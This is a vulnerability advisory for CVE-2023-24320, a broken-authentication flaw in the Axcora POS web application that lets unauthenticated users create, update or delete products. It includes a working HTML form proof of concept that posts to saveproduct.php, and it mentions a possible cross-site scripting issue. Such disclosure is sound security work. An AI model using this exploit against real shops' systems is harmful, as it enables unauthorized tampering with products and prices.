Axcora POS #0~gitf77ec09 Broken Authentication
Researcher
This vulnerability was discovered by @yuyudhn.
Description
The Axcora POS software has a broken authentication issue that could allow unauthenticated users to create, update, or delete products. Additionally, since user input is not sanitized, unauthenticated users may also be able to perform Cross-Site Scripting attacks.
Details
Detail about software affected by CVE-2023-24320.
| Parameter | Description |
|---|---|
| Software | Axcora POS |
| Vendor | mesinkasir |
| Software URL | https://github.com/mesinkasir/posapp |
| Vulnerable Version | #0~gitf77ec09 |
| Classification | Broken Authentication |
| Required privilege | Unauthenticated |
| Publicly disclosed | 2023-02-222 |
Proof of Concept
<html>
<body>
<h1>Axcora POS Broken Access Control</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/posapp/main/saveproduct.php" method="POST">
Barcode : <input type="text" name="code" value="1337" /><br>
Category: <input type="text" name="gen" value="x" /><br>
Name: <input type="text" name="name" value=" x" /><br>
Reception: <input type="text" name="date_arrival" value="" /><br>
Expiry: <input type="text" name="exdate" value="" /><br>
Sell Pirce: <input type="text" name="price" value="1337" /><br>
Buy Price: <input type="text" name="o_price" value="1330" /><br>
<input type="hidden" name="profit" value="7" />
<input type="hidden" name="supplier" value="" />
Quantity: <input type="text" name="qty" value="111" /><br>
<input type="hidden" name="qty_sold" value="111" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
References
- https://www.cve.org/CVERecord?id=CVE-2023-24320
- https://nvd.nist.gov/vuln/detail/CVE-2023-24320
- https://www.tenable.com/cve/CVE-2023-24320
- https://www.youtube.com/watch?v=1FhPL3erWd4